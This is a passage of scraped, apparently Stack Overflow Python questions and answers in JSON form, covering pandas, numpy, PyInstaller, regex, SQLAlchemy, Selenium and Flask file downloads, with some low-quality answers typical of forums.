0.15007500 0.00685843 0.08500848\n\n\nI guess that Pandas should provide a built in function of the data set in the attribute \"data\" could be split in two new columns with names \"name\" and value, including a new index. But I cannot figure out how that works.\nI would need this output:\n name value\n0 A 0.43221600\n1 B 0.02311155\n2 C 0.55057515\n3 D 2.15957924\n4 E 0.03818908\n5 F 0.26853420\n6 G 0.15007500\n7 H 0.00685843\n8 I 0.08500848","Title":"pandas json dictionary to dataframe, reducing columns by creating new columns","Tags":"python,pandas,dataframe","AnswerCount":3,"A_Id":75472833,"Answer":"pd.DataFrame.from_dict(j1)\nshould give you the result you need","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75475387,"CreationDate":"2023-02-16 16:42:50","Q_Score":1,"ViewCount":180,"Question":"I have a use case where messages from an input_topic gets consumed and sent to a list of topics. I'm using producers[i].send_async(msg, callback=callback) where callback = lambda res, msg: consumer.acknowledge(msg). In this case, consumer is subscribed to the input_topic. I checked the backlog of input_topic and it has not decreased at all. Would appreciate if you could point out how to deal with this? What would be the best alternative?\nThanks in advance!","Title":"Pulsar producer send_async() with callback function acknowledging the sent message","Tags":"apache-pulsar,pulsar,python-pulsar","AnswerCount":1,"A_Id":75485101,"Answer":"Have you checked the consumer.acknowledge(msg) has actually been called? One possibility is the producer cannot write messages to the topic, and if the producer with infinite send timeout, you will never get the callback.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75475397,"CreationDate":"2023-02-16 16:43:25","Q_Score":1,"ViewCount":151,"Question":"I have a numpy array with a shape of (3, 4096). However, I need it's shape to be (4096, 3). How do I accomplish this?","Title":"How to reverse the shape of a numpy array","Tags":"python,python-3.x,numpy,numpy-ndarray","AnswerCount":1,"A_Id":75552015,"Answer":"Use:\narr=arr.T\n(or)\narr=np.transpose(arr)\n(or)\narr= arr.reshape(4096, 3)\nwhere arr is your array with shape (3,4096)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75476008,"CreationDate":"2023-02-16 17:38:22","Q_Score":1,"ViewCount":46,"Question":"I have a search program that helps users find files on their system. I would like to have it perform tasks, such as opening the file within editor or changing the parent shell directory to the parent folder of the file exiting my python program.\nRight now I achieve this by running a bash wrapper that executes the commands the python program writes to the stdout. I was wondering if there was a way to do this without the wrapper.\nNote:\nsubprocess and os commands create a subshell and do not alter the parent shell. This is an acceptable answer for opening a file in the editor, but not for moving the current working directory of the parent shell to the desired location on exit.\nAn acceptable alternative might be to open a subshell in a desired directory\nexample\n#this opens a bash shell, but I can't send it to the right directory\nsubprocess.run(\"bash\")","Title":"Python execute code in parent shell upon exit","Tags":"python,posix","AnswerCount":1,"A_Id":75476539,"Answer":"This, if doable, will require quite a hack. Because the PWD is passed from the shell into the subprocess - in this case, the Python process, as a subprocess owned variable, and changing it won't modify what is in the super program.\nOn Unix, maybe it is achievable by opening a detachable sub-process that will pipe keyboard strokes into the TTY after the main program exits - I find this the most likely to succeed than any other thing.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75476135,"CreationDate":"2023-02-16 17:49:41","Q_Score":2,"ViewCount":9580,"Question":"I am receiving following error while converting python file to .exe\nI have tried to uninstall and intsall pyinstaller but it didnt helped out. i upgraded conda but still facing same error. Please support to resolve this issue\nCommand\n(base) G:>pyinstaller --onefile grp.py\nError\nThe 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please remove this package (located in C:\\Users\\alpha\\anaconda3\\lib\\site-packages) using conda remove then try again.\nPython Version\n(base) G:>python --version\nPython 3.9.16","Title":"How to convert python file to exe? The 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller","Tags":"python,python-3.x,anaconda,conda,exe","AnswerCount":6,"A_Id":75640542,"Answer":"The error message you received suggests that the 'pathlib' package installed in your Anaconda environment is causing compatibility issues with PyInstaller. As a result, PyInstaller is unable to create a standalone executable from your Python script.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":3},{"Q_Id":75476135,"CreationDate":"2023-02-16 17:49:41","Q_Score":2,"ViewCount":9580,"Question":"I am receiving following error while converting python file to .exe\nI have tried to uninstall and intsall pyinstaller but it didnt helped out. i upgraded conda but still facing same error. Please support to resolve this issue\nCommand\n(base) G:>pyinstaller --onefile grp.py\nError\nThe 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please remove this package (located in C:\\Users\\alpha\\anaconda3\\lib\\site-packages) using conda remove then try again.\nPython Version\n(base) G:>python --version\nPython 3.9.16","Title":"How to convert python file to exe? The 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller","Tags":"python,python-3.x,anaconda,conda,exe","AnswerCount":6,"A_Id":75640516,"Answer":"I face with the same problem, and I input the 'conda remove pathlib', it didn't work. The result is Not found the packages, so I found the lir 'lib', there was a folder named 'path-list-....', finally I delete it, and it began working!","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":3},{"Q_Id":75476135,"CreationDate":"2023-02-16 17:49:41","Q_Score":2,"ViewCount":9580,"Question":"I am receiving following error while converting python file to .exe\nI have tried to uninstall and intsall pyinstaller but it didnt helped out. i upgraded conda but still facing same error. Please support to resolve this issue\nCommand\n(base) G:>pyinstaller --onefile grp.py\nError\nThe 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please remove this package (located in C:\\Users\\alpha\\anaconda3\\lib\\site-packages) using conda remove then try again.\nPython Version\n(base) G:>python --version\nPython 3.9.16","Title":"How to convert python file to exe? The 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller","Tags":"python,python-3.x,anaconda,conda,exe","AnswerCount":6,"A_Id":75687401,"Answer":"I've experienced the same problem. I managed to solve it by downgrading pyInstaller to 5.1 (from 5.8) without touching pathlib. An additional possibility to consider.","Users Score":6,"is_accepted":false,"Score":1.0,"Available Count":3},{"Q_Id":75478836,"CreationDate":"2023-02-16 23:12:36","Q_Score":1,"ViewCount":71,"Question":"The problem with this program is that the if\/else statements are not working properly. When the answer is \"yes\", the problem also prints the question for when the answer is \"no\". Another problem is that it's not printing the rate1 when it's supposed to.\n# This program calculates the shipping cost as shown in the slide\ninternational = input(\"Are you shipping internationally (yes or no)? \")\nrate1 = 5\nrate2 = 10\n\nif international.upper() == \"yes\":\n shippingRate = rate2\nelse:\n continental = input(\"Are you shipping continental (yes or no)? \")\n if continental.upper() == \"yes\":\n shippingRate = rate1\n else:\n shippingRate = rate2\n \nprint(\"The shipping rate is \" + (\"%.2f\" % shippingRate))","Title":"I am trying to test a program that prints a shipping rate based on yes or no answers","Tags":"python","AnswerCount":2,"A_Id":75478867,"Answer":"I notice you're using a .upper() that would not ever equal \"yes\"\nCause upper() won't ever return lowercase letters.\nBut this code might work with == \"YES\".","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75479380,"CreationDate":"2023-02-17 01:10:27","Q_Score":1,"ViewCount":62,"Question":"I am trying to solve the differential equation 4(y')^3-y'=1\/x^2 in python. I am familiar with the use of odeint to solve coupled ODEs and linear ODEs, but can't find much guidance on nonlinear ODEs such as the one I'm grappling with.\nAttempted to use odeint and scipy but can't seem to implement properly\nAny thoughts are much appreciated\nNB: y is a function of x","Title":"Solving nonlinear differential equations in python","Tags":"python,scipy,differential-equations,odeint","AnswerCount":1,"A_Id":75481202,"Answer":"The problem is that you get 3 valid solutions for the direction at each point of the phase space (including double roots). But each selection criterion breaks down at double roots.\nOne way is to use a DAE solver (which does not exist in scipy) on the system y'=v, 4v^3-v=x^-2\nThe second way is to take the derivative of the equation to get an explicit second-order ODE y''=-2\/x^3\/(12*y'^2-1).\nBoth methods require the selection of the initial direction from the 3 roots of the cubic at the initial point.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75479740,"CreationDate":"2023-02-17 02:30:10","Q_Score":1,"ViewCount":53,"Question":"While parsing file names of TV shows, I would like to extract information about them to use for renaming. I have a working model, but it currently uses 28 if\/elif statements for every iteration of filename I've seen over the last few years. I'd love to be able to condense this to something that I'm not ashamed of, so any help would be appreciated.\nPhase one of this code repentance is to hopefully grab multiple episode numbers. I've gotten as far as the code below, but in the first entry it only displays the first episode number and not all three.\nimport re\n\ndef main():\n pattern = '(.*)\\.S(\\d+)[E(\\d+)]+'\n strings = ['blah.s01e01e02e03', 'foo.s09e09', 'bar.s05e05']\n\n #print(strings)\n for string in strings:\n print(string)\n result = re.search(\"(.*)\\.S(\\d+)[E(\\d+)]+\", string, re.IGNORECASE)\n print(result.group(2))\n\nif __name__== \"__main__\":\n main()\n\nThis outputs:\nblah.s01e01e02e03\n01\nfoo.s09e09\n09\nbar.s05e05\n05\n\nIt's probably trivial, but regular expressions might as well be Cuneiform most days. Thanks in advance!","Title":"Is there a way to find (potentially) multiple results with re.search?","Tags":"python,regex","AnswerCount":3,"A_Id":75479780,"Answer":"re.findall instead of re.search will return a list of all matches","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":1},{"Q_Id":75480557,"CreationDate":"2023-02-17 05:28:01","Q_Score":1,"ViewCount":48,"Question":"I am new to working on Python. I m not able to understand how can I send the correct input t0 the query.\n list_of_names = []\n\n for country in country_name_list.keys():\n list_of_names.append(getValueMethod(country))\n\n sql_query = f\"\"\"SELECT * FROM table1\n where name in (%s);\"\"\"\n \n\n db_results = engine.execute(sql_query, list_of_names).fetchone()\n\n\nGive the error \" not all arguments converted during string formatting\"","Title":"Receiving Error not all arguments converted during string formatting","Tags":"python,sqlalchemy","AnswerCount":2,"A_Id":75480709,"Answer":"If I know right, there are a simpler solution. If you write curly bracets {}, not bracets (), and you place inside the bracets a variable, which contains the %s value, should work. I don't know, how sql works, but you should use one \" each side, not three.\nSorry, I'm not english. From this, maybe I wasn't help with the question, because I don't understand correctly.","Users Score":-2,"is_accepted":false,"Score":-0.1973753202,"Available Count":1},{"Q_Id":75485006,"CreationDate":"2023-02-17 13:36:35","Q_Score":1,"ViewCount":54,"Question":"I need to find elements on a page by looking for text(), so I use xlsx as a database with all the texts that will be searched.\nIt turns out that it is showing the error reported in the title of the publication, this is my code:\n search_num = str(\"'\/\/a[contains(text(),\" + '\"' + row[1] + '\")' + \"]'\")\n print(search_num)\n xPathnum = self.chrome.find_element(By.XPATH, search_num)\n print(xPathnum.get_attribute(\"id\"))\n\nprint(search_num) returns = '\/\/a[contains(text(),\"0027341-66.2323.0124\")]'\nDoes anyone know where I'm going wrong, despite having similar posts on the forum, none of them solved my problem. Grateful for the attention","Title":"TypeError: Failed to execute 'evaluate' on 'Document': The result is not a node set, and therefore cannot be converted to the desired type","Tags":"python,selenium-webdriver,xpath,selenium-chromedriver","AnswerCount":2,"A_Id":75485323,"Answer":"Looks like you have extra quotes here\nstr(\"'\/\/a[contains(text(),\" + '\"' + row[1] + '\")' + \"]'\")\nTry changing to f\"\/\/a[contains(text(),'{row[1]}')]\"","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75486770,"CreationDate":"2023-02-17 16:18:10","Q_Score":1,"ViewCount":31,"Question":"I have a Pandas dataframe equivalent to:\n 'A' 'B'\n'i1' 'i2' 'i3'\n 1 2 4 3 0\n 1 1 2 3 3\n 1 1 2 1 0\n 1 2 4 0 9\n 1 1 2 2 6\n 2 1 1 1 8\n\nwhere ix are index columns and 'A', and 'B' are normal columns. I want to make sure that the indexes are strictly ordered and, when indexes are duplicated, then it is ordered by column 'A'\n 'A' 'B'\n'i1' 'i2' 'i3'\n 1 1 2 1 0\n 1 1 2 2 6\n 1 1 2 3 3\n 1 2 4 0 9\n 1 2 4 3 0\n 2 1 1 1 8\n \n\nWould df.sort_values('A', kind = 'mergesort').sort_index(kind = 'mergesort') do it? And if so, would do it in a stable way? or could the .sort_index() operation disrupt the previous .sort_values() operation in such a way that, for the duplicated indexes, the values of 'A' are no longer ordered?","Title":"Would df.sort_values('A', kind = 'mergesort').sort_index(kind = 'mergesort') be a stable and valid way to sort by index and column?","Tags":"python,pandas,sorting","AnswerCount":1,"A_Id":75487303,"Answer":"When you sort by multiple keys, only the last one is guaranteed to be sorted. The others will be sorted within the previous groups. Finally, the non-key columns will remain sorted in the original order in case of a stable sort such as the mergesort.\nTo answer your question, yes, your method will maintain the original order in case of duplicated keys.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75486790,"CreationDate":"2023-02-17 16:19:46","Q_Score":1,"ViewCount":94,"Question":"Good day. Today I'm trying to send a document generated on the server to the user on the click of a button using Flask.\nMy task is this:\nCreate a document (without saving it on the server). And send it to the user.\nHowever, using a java script, I track the button click on the form and use fetch to make a request to the server. The server retrieves the necessary data and creates a Word document based on it. How can I form a response to a request so that the file starts downloading?\nCode since the creation of the document. (The text of the Word document has been replaced)\npython Falsk:\ndocument = Document()\ndocument.add_heading(\"Some head-title\")\ndocument.add_paragraph('Some text')\nf = BytesIO()\ndocument.save(f)\nf.seek(0)\nreturn send_file(f, as_attachment=True, download_name='some.docx')\n\nHowever, the file does not start downloading.\nHow can I send a file from the server to the user?\nEdits\nThis is my js request.\nfetch('\/getData', {\n method : 'POST',\n headers: {\n 'Accept': 'application\/json',\n 'Content-Type': 'application\/json'\n },\n body: JSON.stringify({\n someData: someData,\n })\n})\n.then(response => \n response.text()\n)\n.then(response =>{\n console.log(response);\n});\n\nThis is my html\n
\n